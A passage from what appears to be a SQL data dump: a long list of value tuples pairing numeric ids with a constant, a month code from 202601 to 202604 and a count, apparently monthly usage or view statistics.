02601',44),(2964,2,'202601',45),(3069,2,'202601',45),(3267,2,'202601',45),(3486,2,'202601',45),(3721,2,'202601',45),(3777,2,'202601',45),(4663,2,'202601',45),(4668,2,'202601',45),(5264,2,'202601',45),(5295,2,'202601',45),(1730,2,'202601',46),(1734,2,'202601',46),(2178,2,'202601',46),(4400,2,'202601',46),(4976,2,'202601',46),(4996,2,'202601',46),(2911,2,'202601',47),(3030,2,'202601',47),(4582,2,'202601',47),(4645,2,'202601',47),(5323,2,'202601',47),(1592,2,'202601',48),(3066,2,'202601',48),(4323,2,'202601',48),(4660,2,'202601',48),(477,2,'202601',49),(483,2,'202601',49),(1703,2,'202601',49),(1705,2,'202601',49),(2956,2,'202601',49),(3063,2,'202601',49),(3124,2,'202601',49),(4329,2,'202601',49),(4382,2,'202601',49),(5425,2,'202601',49),(102,2,'202601',50),(1722,2,'202601',50),(2801,2,'202601',50),(3027,2,'202601',50),(3290,2,'202601',50),(3749,2,'202601',50),(4368,2,'202601',50),(4454,2,'202601',50),(5134,2,'202601',50),(5163,2,'202601',50),(3038,2,'202601',51),(3724,2,'202601',51),(3742,2,'202601',51),(3764,2,'202601',51),(4741,2,'202601',51),(4874,2,'202601',51),(1606,2,'202601',52),(1711,2,'202601',52),(3307,2,'202601',52),(4520,2,'202601',52),(4750,2,'202601',52),(5128,2,'202601',52),(5317,2,'202601',52),(1610,2,'202601',53),(3259,2,'202601',53),(472,2,'202601',54),(476,2,'202601',54),(1596,2,'202601',54),(2457,2,'202601',54),(2617,2,'202601',54),(5334,2,'202601',54),(5578,2,'202601',54),(5601,2,'202601',54),(2609,2,'202601',55),(3006,2,'202601',55),(3240,2,'202601',55),(5298,2,'202601',55),(5353,2,'202601',55),(1766,2,'202601',56),(3498,2,'202601',56),(5415,2,'202601',56),(5762,2,'202601',56),(2658,2,'202601',57),(5268,2,'202601',57),(1724,2,'202601',58),(4977,2,'202601',58),(5314,2,'202601',58),(3005,2,'202601',59),(3746,2,'202601',59),(5062,2,'202601',59),(5157,2,'202601',59),(5472,2,'202601',59),(3072,2,'202601',60),(4556,2,'202601',60),(5276,2,'202601',60),(5492,2,'202601',60),(5626,2,'202601',60),(3023,2,'202601',61),(4529,2,'202601',61),(5125,2,'202601',61),(5662,2,'202601',62),(3297,2,'202601',63),(4980,2,'202601',63),(2152,2,'202601',64),(3117,2,'202601',64),(5593,2,'202601',64),(1612,2,'202601',65),(4612,2,'202601',65),(5292,2,'202601',65),(5561,2,'202601',65),(2809,2,'202601',66),(3313,2,'202601',67),(1780,2,'202601',68),(5033,2,'202601',68),(5153,2,'202601',68),(4712,2,'202601',69),(4776,2,'202601',69),(5080,2,'202601',69),(5307,2,'202601',69),(5467,2,'202601',69),(5567,2,'202601',69),(5605,2,'202601',69),(5674,2,'202601',69),(4722,2,'202601',70),(5412,2,'202601',70),(2804,2,'202601',71),(4983,2,'202601',71),(5441,2,'202601',71),(1728,2,'202601',72),(4436,2,'202601',72),(5363,2,'202601',73),(5512,2,'202601',73),(1604,2,'202601',75),(469,2,'202601',76),(5271,2,'202601',76),(5515,2,'202601',76),(1608,2,'202601',77),(5280,2,'202601',78),(5461,2,'202601',78),(473,2,'202601',79),(1594,2,'202601',79),(4335,2,'202601',79),(5666,2,'202601',79),(487,2,'202601',80),(5433,2,'202601',80),(5598,2,'202601',80),(1584,2,'202601',81),(5449,2,'202601',82),(110,2,'202601',85),(4753,2,'202601',85),(570,2,'202601',87),(2309,2,'202601',89),(5076,2,'202601',89),(5400,2,'202601',90),(5683,2,'202601',90),(1778,2,'202601',91),(3102,2,'202601',91),(5700,2,'202601',91),(2297,2,'202601',92),(5570,2,'202601',94),(5464,2,'202601',97),(467,2,'202601',102),(468,2,'202601',103),(2775,2,'202601',103),(3083,2,'202601',103),(5409,2,'202601',103),(335,2,'202601',104),(2813,2,'202601',104),(5436,2,'202601',104),(1600,2,'202601',105),(5428,2,'202601',105),(5489,2,'202601',105),(1586,2,'202601',107),(3060,2,'202601',108),(2769,2,'202601',109),(5259,2,'202601',110),(1588,2,'202601',111),(87,2,'202601',112),(5457,2,'202601',113),(1614,2,'202601',114),(2503,2,'202601',116),(2704,2,'202601',116),(84,2,'202601',121),(74,2,'202601',126),(4930,2,'202601',126),(1598,2,'202601',128),(5454,2,'202601',128),(108,2,'202601',130),(5397,2,'202601',133),(5696,2,'202601',134),(470,2,'202601',135),(5502,2,'202601',135),(5406,2,'202601',146),(5420,2,'202601',147),(474,2,'202601',151),(1544,2,'202601',158),(3781,2,'202601',168),(1602,2,'202601',169),(91,2,'202601',192),(1582,2,'202601',198),(2904,2,'202601',209),(89,2,'202601',249),(76,2,'202601',267),(68,2,'202601',301),(72,2,'202601',306),(80,2,'202601',853),(9,2,'202601',10891),(106,2,'202602',13),(5042,2,'202602',16),(1732,2,'202602',17),(5020,2,'202602',17),(5050,2,'202602',17),(3275,2,'202602',18),(4432,2,'202602',18),(2293,2,'202602',19),(2751,2,'202602',20),(3273,2,'202602',20),(4428,2,'202602',20),(4668,2,'202602',20),(4685,2,'202602',20),(1709,2,'202602',21),(1737,2,'202602',21),(2063,2,'202602',21),(2148,2,'202602',21),(2161,2,'202602',21),(2165,2,'202602',21),(4323,2,'202602',21),(5046,2,'202602',21),(1749,2,'202602',22),(1776,2,'202602',22),(2248,2,'202602',22),(2296,2,'202602',22),(3282,2,'202602',22),(3714,2,'202602',22),(3735,2,'202602',22),(1699,2,'202602',23),(1720,2,'202602',23),(1747,2,'202602',23),(2809,2,'202602',23),(3096,2,'202602',23),(3247,2,'202602',23),(3482,2,'202602',23),(4357,2,'202602',23),(4440,2,'202602',23),(4688,2,'202602',23),(4694,2,'202602',23),(4893,2,'202602',23),(4996,2,'202602',23),(478,2,'202602',24),(482,2,'202602',24),(1695,2,'202602',24),(1726,2,'202602',24),(1782,2,'202602',24),(3097,2,'202602',24),(3245,2,'202602',24),(3269,2,'202602',24),(3271,2,'202602',24),(3531,2,'202602',24),(4382,2,'202602',24),(4514,2,'202602',24),(4517,2,'202602',24),(4792,2,'202602',24),(486,2,'202602',25),(2154,2,'202602',25),(2252,2,'202602',25),(3104,2,'202602',25),(3107,2,'202602',25),(3257,2,'202602',25),(4329,2,'202602',25),(4373,2,'202602',25),(4377,2,'202602',25),(4412,2,'202602',25),(4674,2,'202602',25),(5128,2,'202602',25),(5330,2,'202602',25),(2178,2,'202602',26),(2911,2,'202602',26),(3278,2,'202602',26),(3534,2,'202602',26),(3771,2,'202602',26),(4888,2,'202602',26),(1707,2,'202602',27),(1751,2,'202602',27),(1768,2,'202602',27),(3290,2,'202602',27),(3489,2,'202602',27),(4768,2,'202602',27),(4858,2,'202602',27),(4988,2,'202602',27),(5037,2,'202602',27),(5058,2,'202602',27),(5140,2,'202602',27),(5153,2,'202602',27),(5301,2,'202602',27),(480,2,'202602',28),(1713,2,'202602',28),(2156,2,'202602',28),(3287,2,'202602',28),(3742,2,'202602',28),(4404,2,'202602',28),(4546,2,'202602',28),(4747,2,'202602',28),(2748,2,'202602',29),(3063,2,'202602',29),(3087,2,'202602',29),(3243,2,'202602',29),(3280,2,'202602',29),(3430,2,'202602',29),(4396,2,'202602',29),(4416,2,'202602',29),(4706,2,'202602',29),(4762,2,'202602',29),(4797,2,'202602',29),(5256,2,'202602',29),(5295,2,'202602',29),(110,2,'202602',30),(479,2,'202602',30),(1743,2,'202602',30),(2609,2,'202602',30),(2991,2,'202602',30),(2993,2,'202602',30),(3117,2,'202602',30),(3229,2,'202602',30),(4238,2,'202602',30),(4681,2,'202602',30),(4697,2,'202602',30),(4712,2,'202602',30),(4874,2,'202602',30),(5028,2,'202602',30),(5383,2,'202602',30),(484,2,'202602',31),(1701,2,'202602',31),(3034,2,'202602',31),(3069,2,'202602',31),(3285,2,'202602',31),(4275,2,'202602',31),(4391,2,'202602',31),(4582,2,'202602',31),(4691,2,'202602',31),(4741,2,'202602',31),(4744,2,'202602',31),(4976,2,'202602',31),(5024,2,'202602',31),(5264,2,'202602',31),(5289,2,'202602',31),(483,2,'202602',32),(1697,2,'202602',32),(1730,2,'202602',32),(2150,2,'202602',32),(3109,2,'202602',32),(4387,2,'202602',32),(4654,2,'202602',32),(4771,2,'202602',32),(4870,2,'202602',32),(1734,2,'202602',33),(3079,2,'202602',33),(3259,2,'202602',33),(4338,2,'202602',33),(4408,2,'202602',33),(4703,2,'202602',33),(5101,2,'202602',33),(5323,2,'202602',33),(5356,2,'202602',33),(481,2,'202602',34),(1711,2,'202602',34),(1745,2,'202602',34),(2801,2,'202602',34),(2989,2,'202602',34),(3265,2,'202602',34),(3731,2,'202602',34),(3752,2,'202602',34),(4657,2,'202602',34),(4709,2,'202602',34),(4862,2,'202602',34),(5134,2,'202602',34),(5248,2,'202602',34),(5317,2,'202602',34),(488,2,'202602',35),(1703,2,'202602',35),(3226,2,'202602',35),(3261,2,'202602',35),(4444,2,'202602',35),(4677,2,'202602',35),(4878,2,'202602',35),(5125,2,'202602',35),(5298,2,'202602',35),(5326,2,'202602',35),(5359,2,'202602',35),(472,2,'202602',36),(1596,2,'202602',36),(1722,2,'202602',36),(3090,2,'202602',36),(3721,2,'202602',36),(4454,2,'202602',36),(4608,2,'202602',36),(4648,2,'202602',36),(4802,2,'202602',36),(4883,2,'202602',36),(4897,2,'202602',36),(477,2,'202602',37),(1715,2,'202602',37),(2964,2,'202602',37),(3066,2,'202602',37),(3092,2,'202602',37),(3240,2,'202602',37),(3249,2,'202602',37),(3479,2,'202602',37),(3746,2,'202602',37),(4591,2,'202602',37),(4776,2,'202602',37),(5054,2,'202602',37),(5304,2,'202602',37),(5425,2,'202602',37),(2965,2,'202602',38),(3027,2,'202602',38),(3041,2,'202602',38),(3267,2,'202602',38),(4700,2,'202602',38),(5292,2,'202602',38),(5378,2,'202602',38),(2658,2,'202602',39),(3263,2,'202602',39),(3316,2,'202602',39),(4341,2,'202602',39),(4363,2,'202602',39),(4566,2,'202602',39),(4756,2,'202602',39),(4765,2,'202602',39),(5374,2,'202602',39),(5412,2,'202602',39),(1739,2,'202602',40),(1766,2,'202602',40),(3498,2,'202602',40),(3710,2,'202602',40),(3727,2,'202602',40),(4524,2,'202602',40),(4977,2,'202602',40),(5080,2,'202602',40),(5253,2,'202602',40),(5271,2,'202602',40),(102,2,'202602',41),(3005,2,'202602',41),(3777,2,'202602',41),(4400,2,'202602',41),(4420,2,'202602',41),(4529,2,'202602',41),(4612,2,'202602',41),(4750,2,'202602',41),(5314,2,'202602',41),(5334,2,'202602',41),(5467,2,'202602',41),(5636,2,'202602',41),(1770,2,'202602',42),(2152,2,'202602',42),(3724,2,'202602',42),(4326,2,'202602',42),(4368,2,'202602',42),(4651,2,'202602',42),(4983,2,'202602',42),(5131,2,'202602',42),(3045,2,'202602',43),(3313,2,'202602',43),(5146,2,'202602',43),(5609,2,'202602',43),(476,2,'202602',44),(3124,2,'202602',44),(3127,2,'202602',44),(3438,2,'202602',44),(3738,2,'202602',44),(4542,2,'202602',44),(4587,2,'202602',44),(5320,2,'202602',44),(5585,2,'202602',44),(485,2,'202602',45),(3072,2,'202602',45),(3486,2,'202602',45),(4551,2,'202602',45),(4759,2,'202602',45),(5492,2,'202602',45),(1724,2,'202602',46),(2617,2,'202602',46),(3297,2,'202602',46),(4332,2,'202602',46),(5268,2,'202602',46),(1592,2,'202602',47),(2558,2,'202602',47),(3253,2,'202602',47),(3774,2,'202602',47),(5067,2,'202602',47),(5567,2,'202602',47),(5674,2,'202602',47),(3251,2,'202602',48),(4335,2,'202602',48),(4424,2,'202602',48),(4448,2,'202602',48),(4866,2,'202602',48),(5461,2,'202602',48),(5472,2,'202602',48),(1590,2,'202602',49),(1772,2,'202602',49),(2159,2,'202602',49),(4301,2,'202602',49),(4663,2,'202602',49),(4753,2,'202602',49),(5310,2,'202602',49),(5363,2,'202602',49),(1606,2,'202602',50),(2956,2,'202602',50),(5512,2,'202602',50),(5662,2,'202602',50),(2457,2,'202602',51),(4457,2,'202602',51),(4556,2,'202602',51),(5464,2,'202602',51),(5582,2,'202602',51),(5666,2,'202602',51),(471,2,'202602',52),(2309,2,'202602',52),(3006,2,'202602',52),(3307,2,'202602',52),(5033,2,'202602',52),(1610,2,'202602',53),(1718,2,'202602',53),(5441,2,'202602',53),(5122,2,'202602',54),(5157,2,'202602',54),(5449,2,'202602',55),(5561,2,'202602',55),(3023,2,'202602',56),(3764,2,'202602',56),(5276,2,'202602',56),(5353,2,'202602',56),(1612,2,'202602',57),(5062,2,'202602',57),(5137,2,'202602',57),(5163,2,'202602',57),(3004,2,'202602',59),(5515,2,'202602',59),(1594,2,'202602',60),(4980,2,'202602',60),(5700,2,'202602',60),(3749,2,'202602',61),(5457,2,'202602',61),(1778,2,'202602',62),(4645,2,'202602',62),(5071,2,'202602',62),(5415,2,'202602',62),(5605,2,'202602',62),(5259,2,'202602',63),(5400,2,'202602',63),(5578,2,'202602',63),(2804,2,'202602',64),(4660,2,'202602',64),(5280,2,'202602',64),(3030,2,'202602',65),(1604,2,'202602',66),(5570,2,'202602',66),(5626,2,'202602',66),(5683,2,'202602',66),(4520,2,'202602',67),(2297,2,'202602',68),(5433,2,'202602',69),(5489,2,'202602',69),(570,2,'202602',70),(1584,2,'202602',70),(4436,2,'202602',72),(5076,2,'202602',72),(5307,2,'202602',73),(1598,2,'202602',75),(1600,2,'202602',75),(1774,2,'202602',75),(3102,2,'202602',76),(5436,2,'202602',77),(5735,2,'202602',77),(487,2,'202602',78),(1705,2,'202602',78),(1780,2,'202602',78),(5409,2,'202602',78),(1728,2,'202602',79),(2813,2,'202602',79),(5598,2,'202602',79),(5771,2,'202602',80),(469,2,'202602',82),(1608,2,'202602',82),(5696,2,'202602',84),(4722,2,'202602',86),(473,2,'202602',87),(1741,2,'202602',91),(5738,2,'202602',92),(5428,2,'202602',94),(3083,2,'202602',95),(467,2,'202602',97),(1588,2,'202602',98),(2775,2,'202602',99),(3541,2,'202602',99),(5454,2,'202602',100),(5593,2,'202602',102),(84,2,'202602',103),(1544,2,'202602',103),(2704,2,'202602',103),(2769,2,'202602',105),(1614,2,'202602',106),(74,2,'202602',108),(2503,2,'202602',108),(87,2,'202602',111),(468,2,'202602',112),(108,2,'202602',113),(1586,2,'202602',116),(5601,2,'202602',116),(5778,2,'202602',120),(335,2,'202602',122),(5785,2,'202602',124),(4930,2,'202602',127),(470,2,'202602',134),(5420,2,'202602',135),(1602,2,'202602',139),(5397,2,'202602',143),(2904,2,'202602',144),(474,2,'202602',146),(3781,2,'202602',147),(5769,2,'202602',148),(5762,2,'202602',160),(91,2,'202602',175),(5406,2,'202602',179),(68,2,'202602',217),(1582,2,'202602',230),(76,2,'202602',235),(72,2,'202602',277),(89,2,'202602',361),(3038,2,'202602',440),(5502,2,'202602',516),(80,2,'202602',570),(3060,2,'202602',1328),(9,2,'202602',14749),(106,2,'202603',13),(1695,2,'202603',14),(3229,2,'202603',15),(5046,2,'202603',15),(1697,2,'202603',16),(2252,2,'202603',16),(2296,2,'202603',16),(1720,2,'202603',17),(2156,2,'202603',17),(3092,2,'202603',17),(3096,2,'202603',17),(3257,2,'202603',17),(3273,2,'202603',17),(4432,2,'202603',17),(4878,2,'202603',17),(1730,2,'202603',18),(1751,2,'202603',18),(2161,2,'202603',18),(3247,2,'202603',18),(3275,2,'202603',18),(4546,2,'202603',18),(4792,2,'202603',18),(4858,2,'202603',18),(5054,2,'202603',18),(1732,2,'202603',19),(3243,2,'202603',19),(3285,2,'202603',19),(4373,2,'202603',19),(4382,2,'202603',19),(4428,2,'202603',19),(4797,2,'202603',19),(5037,2,'202603',19),(1707,2,'202603',20),(2165,2,'202603',20),(3278,2,'202603',20),(5042,2,'202603',20),(5050,2,'202603',20),(5295,2,'202603',20),(1699,2,'202603',21),(1737,2,'202603',21),(2154,2,'202603',21),(3240,2,'202603',21),(3249,2,'202603',21),(3269,2,'202603',21),(3280,2,'202603',21),(3287,2,'202603',21),(4404,2,'202603',21),(4893,2,'202603',21),(5020,2,'202603',21),(1709,2,'202603',22),(2150,2,'202603',22),(4363,2,'202603',22),(4387,2,'202603',22),(5058,2,'202603',22),(5125,2,'202603',22),(5271,2,'202603',22),(110,2,'202603',23),(1713,2,'202603',23),(2063,2,'202603',23),(2248,2,'202603',23),(2293,2,'202603',23),(2991,2,'202603',23),(3271,2,'202603',23),(4275,2,'202603',23),(4357,2,'202603',23),(4654,2,'202603',23),(4756,2,'202603',23),(4762,2,'202603',23),(4771,2,'202603',23),(4862,2,'202603',23),(5289,2,'202603',23),(3261,2,'202603',24),(3265,2,'202603',24),(3316,2,'202603',24),(3430,2,'202603',24),(3714,2,'202603',24),(3777,2,'202603',24),(4332,2,'202603',24),(4440,2,'202603',24),(4514,2,'202603',24),(4681,2,'202603',24),(4709,2,'202603',24),(4888,2,'202603',24),(4897,2,'202603',24),(4988,2,'202603',24),(5330,2,'202603',24),(5472,2,'202603',24),(478,2,'202603',25),(1776,2,'202603',25),(2152,2,'202603',25),(2178,2,'202603',25),(2609,2,'202603',25),(3245,2,'202603',25),(3282,2,'202603',25),(3746,2,'202603',25),(3771,2,'202603',25),(4329,2,'202603',25),(4412,2,'202603',25),(4416,2,'202603',25),(4444,2,'202603',25),(4712,2,'202603',25),(4765,2,'202603',25),(4883,2,'202603',25),(5301,2,'202603',25),(1590,2,'202603',26),(1711,2,'202603',26),(1722,2,'202603',26),(1772,2,'202603',26),(2751,2,'202603',26),(2911,2,'202603',26),(3097,2,'202603',26),(3107,2,'202603',26),(3263,2,'202603',26),(3531,2,'202603',26),(4424,2,'202603',26),(4582,2,'202603',26),(4768,2,'202603',26),(5024,2,'202603',26),(5122,2,'202603',26),(5140,2,'202603',26),(486,2,'202603',27),(1743,2,'202603',27),(1749,2,'202603',27),(2748,2,'202603',27),(3079,2,'202603',27),(3109,2,'202603',27),(4747,2,'202603',27),(4870,2,'202603',27),(5425,2,'202603',27),(1703,2,'202603',28),(1724,2,'202603',28),(1768,2,'202603',28),(2148,2,'202603',28),(2965,2,'202603',28),(3482,2,'202603',28),(3534,2,'202603',28),(3721,2,'202603',28),(4338,2,'202603',28),(4368,2,'202603',28),(4648,2,'202603',28),(4700,2,'202603',28),(4703,2,'202603',28),(4976,2,'202603',28),(5128,2,'202603',28),(5256,2,'202603',28),(5323,2,'202603',28),(3005,2,'202603',29),(4408,2,'202603',29),(4566,2,'202603',29),(4688,2,'202603',29),(4691,2,'202603',29),(4697,2,'202603',29),(5467,2,'202603',29),(488,2,'202603',30),(1745,2,'202603',30),(1782,2,'202603',30),(2809,2,'202603',30),(3226,2,'202603',30),(4341,2,'202603',30),(4377,2,'202603',30),(4391,2,'202603',30),(4400,2,'202603',30),(4457,2,'202603',30),(4517,2,'202603',30),(4657,2,'202603',30),(4663,2,'202603',30),(4706,2,'202603',30),(5028,2,'202603',30),(5314,2,'202603',30),(5356,2,'202603',30),(480,2,'202603',31),(2993,2,'202603',31),(3072,2,'202603',31),(3087,2,'202603',31),(3489,2,'202603',31),(4323,2,'202603',31),(4651,2,'202603',31),(4741,2,'202603',31),(4750,2,'202603',31),(4802,2,'202603',31),(5253,2,'202603',31),(5292,2,'202603',31),(1739,2,'202603',32),(2964,2,'202603',32),(3117,2,'202603',32),(3124,2,'202603',32),(3267,2,'202603',32),(3307,2,'202603',32),(3313,2,'202603',32),(3479,2,'202603',32),(3727,2,'202603',32),(3752,2,'202603',32),(4608,2,'202603',32),(4668,2,'202603',32),(4685,2,'202603',32),(4694,2,'202603',32),(5131,2,'202603',32),(5146,2,'202603',32),(5317,2,'202603',32),(481,2,'202603',33),(1770,2,'202603',33),(3027,2,'202603',33),(3066,2,'202603',33),(4744,2,'202603',33),(4874,2,'202603',33),(5264,2,'202603',33),(5378,2,'202603',33),(5515,2,'202603',33),(477,2,'202603',34),(1705,2,'202603',34),(1766,2,'202603',34),(3069,2,'202603',34),(3486,2,'202603',34),(3731,2,'202603',34),(4674,2,'202603',34),(4677,2,'202603',34),(484,2,'202603',35),(2658,2,'202603',35),(3090,2,'202603',35),(3438,2,'202603',35),(4524,2,'202603',35),(4551,2,'202603',35),(5033,2,'202603',35),(5248,2,'202603',35),(5326,2,'202603',35),(5449,2,'202603',35),(5833,2,'202603',35),(476,2,'202603',36),(1726,2,'202603',36),(3041,2,'202603',36),(3290,2,'202603',36),(3498,2,'202603',36),(4396,2,'202603',36),(5137,2,'202603',36),(5276,2,'202603',36),(5320,2,'202603',36),(5359,2,'202603',36),(5582,2,'202603',36),(1715,2,'202603',37),(1747,2,'202603',37),(3104,2,'202603',37),(3774,2,'202603',37),(4335,2,'202603',37),(4866,2,'202603',37),(5334,2,'202603',37),(5383,2,'202603',37),(1604,2,'202603',38),(1701,2,'202603',38),(3034,2,'202603',38),(3038,2,'202603',38),(3735,2,'202603',38),(4591,2,'202603',38),(4983,2,'202603',38),(4996,2,'202603',38),(5062,2,'202603',38),(5134,2,'202603',38),(5153,2,'202603',38),(5304,2,'202603',38),(5824,2,'202603',38),(102,2,'202603',39),(479,2,'202603',39),(1592,2,'202603',39),(1734,2,'202603',39),(2989,2,'202603',39),(3030,2,'202603',39),(4326,2,'202603',39),(4436,2,'202603',39),(4529,2,'202603',39),(4587,2,'202603',39),(4753,2,'202603',39),(5067,2,'202603',39),(5412,2,'202603',39),(5585,2,'202603',39),(5609,2,'202603',39),(483,2,'202603',40),(2457,2,'202603',40),(3724,2,'202603',40),(4556,2,'202603',40),(5828,2,'202603',40),(482,2,'202603',41),(2159,2,'202603',41),(4542,2,'202603',41),(5578,2,'202603',41),(3259,2,'202603',42),(3738,2,'202603',42),(4454,2,'202603',42),(5101,2,'202603',42),(5298,2,'202603',42),(5310,2,'202603',42),(5512,2,'202603',42),(5666,2,'202603',42),(485,2,'202603',43),(1594,2,'202603',43),(1600,2,'202603',43),(2801,2,'202603',43),(3045,2,'202603',43),(4238,2,'202603',43),(5567,2,'202603',43),(5674,2,'202603',43),(3251,2,'202603',44),(4301,2,'202603',44),(4420,2,'202603',44),(5353,2,'202603',44),(5374,2,'202603',44),(3006,2,'202603',45),(3023,2,'202603',45),(4448,2,'202603',45),(4776,2,'202603',45),(1596,2,'202603',46),(2297,2,'202603',46),(2617,2,'202603',46),(3004,2,'202603',46),(3127,2,'202603',46),(3742,2,'202603',46),(1606,2,'202603',47),(3063,2,'202603',47),(4612,2,'202603',47),(5157,2,'202603',47),(5844,2,'202603',47),(1610,2,'202603',48),(1612,2,'202603',48),(4660,2,'202603',48),(5080,2,'202603',48),(4722,2,'202603',49),(5163,2,'202603',49),(5268,2,'202603',49),(5409,2,'202603',49),(5561,2,'202603',49),(5636,2,'202603',49),(4645,2,'202603',51),(5363,2,'202603',51),(5771,2,'202603',51),(1728,2,'202603',52),(2956,2,'202603',52),(5735,2,'202603',52),(5464,2,'202603',53),(5492,2,'202603',53),(1718,2,'202603',54),(3083,2,'202603',54),(3253,2,'202603',54),(5461,2,'202603',54),(5605,2,'202603',54),(1584,2,'202603',55),(5076,2,'202603',55),(5662,2,'202603',55),(4980,2,'202603',56),(570,2,'202603',57),(1778,2,'202603',57),(3710,2,'202603',57),(5441,2,'202603',57),(487,2,'202603',58),(2309,2,'202603',58),(3749,2,'202603',58),(5280,2,'202603',58),(2558,2,'202603',59),(5457,2,'202603',60),(5570,2,'202603',60),(5626,2,'202603',60),(469,2,'202603',62),(472,2,'202603',62),(1598,2,'202603',62),(5433,2,'202603',62),(1588,2,'202603',63),(2769,2,'202603',63),(3297,2,'202603',63),(3764,2,'202603',63),(5683,2,'202603',63),(471,2,'202603',64),(5598,2,'202603',64),(2775,2,'202603',65),(5601,2,'202603',65),(1608,2,'202603',67),(4520,2,'202603',67),(4977,2,'202603',69),(5307,2,'202603',69),(5259,2,'202603',70),(5400,2,'202603',70),(5738,2,'202603',70),(2804,2,'202603',71),(4759,2,'202603',71),(5071,2,'202603',73),(473,2,'202603',74),(1586,2,'202603',74),(5415,2,'202603',74),(5428,2,'202603',74),(3102,2,'202603',78),(467,2,'202603',80),(5816,2,'202603',80),(1614,2,'202603',82),(1544,2,'202603',83),(2813,2,'202603',83),(5436,2,'202603',83),(5489,2,'202603',83),(5700,2,'202603',83),(2704,2,'202603',85),(5769,2,'202603',85),(1774,2,'202603',90),(5847,2,'202603',91),(5420,2,'202603',92),(5778,2,'202603',93),(3541,2,'202603',96),(5762,2,'202603',96),(468,2,'202603',100),(5696,2,'202603',100),(2503,2,'202603',102),(5785,2,'202603',102),(74,2,'202603',104),(335,2,'202603',104),(5454,2,'202603',105),(470,2,'202603',107),(2904,2,'202603',108),(1741,2,'202603',109),(108,2,'202603',115),(1602,2,'202603',116),(87,2,'202603',121),(5593,2,'202603',125),(84,2,'202603',130),(4930,2,'202603',131),(474,2,'202603',132),(5397,2,'202603',139),(1780,2,'202603',144),(5406,2,'202603',147),(5502,2,'202603',148),(91,2,'202603',162),(5821,2,'202603',166),(1582,2,'202603',172),(3781,2,'202603',176),(68,2,'202603',216),(89,2,'202603',218),(76,2,'202603',227),(72,2,'202603',255),(3060,2,'202603',1464),(80,2,'202603',1708),(9,2,'202603',21609),(106,2,'202604',10),(2248,2,'202604',10),(2293,2,'202604',12),(3285,2,'202604',12),(2993,2,'202604',13),(2609,2,'202604',14),(4440,2,'202604',14),(2296,2,'202604',15),(4382,2,'202604',15),(1772,2,'202604',16),(2156,2,'202604',16),(3107,2,'202604',16),(3247,2,'202604',16),(3273,2,'202604',16),(1709,2,'202604',17),(1732,2,'202604',17),(5037,2,'202604',17),(5320,2,'202604',17),(1720,2,'202604',18),(1745,2,'202604',18),(2150,2,'202604',18),(5028,2,'202604',18),(1739,2,'202604',19),(2252,2,'202604',19),(3263,2,'202604',19),(3280,2,'202604',19),(4416,2,'202604',19),(4444,2,'202604',19),(4677,2,'202604',19),(4858,2,'202604',19),(5881,2,'202604',19),(3721,2,'202604',20),(4341,2,'202604',20),(4404,2,'202604',20),(4408,2,'202604',20),(4870,2,'202604',20),(4976,2,'202604',20),(4983,2,'202604',20),(5046,2,'202604',20),(1697,2,'202604',21),(2161,2,'202604',21),(3079,2,'202604',21),(3489,2,'202604',21),(4391,2,'202604',21),(4648,2,'202604',21),(4706,2,'202604',21),(1695,2,'202604',22),(1749,2,'202604',22),(1751,2,'202604',22),(2748,2,'202604',22),(3038,2,'202604',22),(3278,2,'202604',22),(3287,2,'202604',22),(4373,2,'202604',22),(4681,2,'202604',22),(4765,2,'202604',22),(4888,2,'202604',22),(1701,2,'202604',23),(3109,2,'202604',23),(3240,2,'202604',23),(3245,2,'202604',23),(3259,2,'202604',23),(3261,2,'202604',23),(3269,2,'202604',23),(4363,2,'202604',23),(4428,2,'202604',23),(4709,2,'202604',23),(4768,2,'202604',23),(5134,2,'202604',23),(1707,2,'202604',24),(2165,2,'202604',24),(3249,2,'202604',24),(3486,2,'202604',24),(3727,2,'202604',24),(4412,2,'202604',24),(4542,2,'202604',24),(4546,2,'202604',24),(4883,2,'202604',24),(4893,2,'202604',24),(5042,2,'202604',24),(110,2,'202604',25),(1776,2,'202604',25),(1782,2,'202604',25),(2152,2,'202604',25),(2178,2,'202604',25),(2991,2,'202604',25),(3104,2,'202604',25),(3127,2,'202604',25),(3746,2,'202604',25),(4514,2,'202604',25),(4591,2,'202604',25),(4688,2,'202604',25),(4792,2,'202604',25),(4988,2,'202604',25),(4996,2,'202604',25),(480,2,'202604',26),(1711,2,'202604',26),(1743,2,'202604',26),(2063,2,'202604',26),(3045,2,'202604',26),(3257,2,'202604',26),(3714,2,'202604',26),(4357,2,'202604',26),(4657,2,'202604',26),(4897,2,'202604',26),(5137,2,'202604',26),(5256,2,'202604',26),(1705,2,'202604',27),(1737,2,'202604',27),(1768,2,'202604',27),(3063,2,'202604',27),(3731,2,'202604',27),(3742,2,'202604',27),(4323,2,'202604',27),(4797,2,'202604',27),(5020,2,'202604',27),(5140,2,'202604',27),(5292,2,'202604',27),(5295,2,'202604',27),(5884,2,'202604',27),(1726,2,'202604',28),(2751,2,'202604',28),(3092,2,'202604',28),(3229,2,'202604',28),(3271,2,'202604',28),(3430,2,'202604',28),(3498,2,'202604',28),(3531,2,'202604',28),(4377,2,'202604',28),(4424,2,'202604',28),(4432,2,'202604',28),(4454,2,'202604',28),(4582,2,'202604',28),(4654,2,'202604',28),(4668,2,'202604',28),(4771,2,'202604',28),(5125,2,'202604',28),(5323,2,'202604',28),(1715,2,'202604',29),(2154,2,'202604',29),(2965,2,'202604',29),(3072,2,'202604',29),(3243,2,'202604',29),(3267,2,'202604',29),(3282,2,'202604',29),(4275,2,'202604',29),(4332,2,'202604',29),(4338,2,'202604',29),(4517,2,'202604',29),(4674,2,'202604',29),(4741,2,'202604',29),(4747,2,'202604',29),(4866,2,'202604',29),(5024,2,'202604',29),(482,2,'202604',30),(484,2,'202604',30),(2617,2,'202604',30),(3005,2,'202604',30),(3097,2,'202604',30),(3265,2,'202604',30),(3316,2,'202604',30),(3771,2,'202604',30),(4663,2,'202604',30),(4756,2,'202604',30),(4762,2,'202604',30),(4862,2,'202604',30),(5301,2,'202604',30),(5383,2,'202604',30),(5412,2,'202604',30),(1734,2,'202604',31),(2964,2,'202604',31),(3027,2,'202604',31),(3226,2,'202604',31),(3275,2,'202604',31),(3774,2,'202604',31),(4329,2,'202604',31),(4387,2,'202604',31),(4744,2,'202604',31),(4977,2,'202604',31),(5058,2,'202604',31),(5122,2,'202604',31),(5128,2,'202604',31),(5264,2,'202604',31),(5289,2,'202604',31),(5334,2,'202604',31),(5425,2,'202604',31),(5467,2,'202604',31),(477,2,'202604',32),(1766,2,'202604',32),(2457,2,'202604',32),(2911,2,'202604',32),(3066,2,'202604',32),(3482,2,'202604',32),(3752,2,'202604',32),(4691,2,'202604',3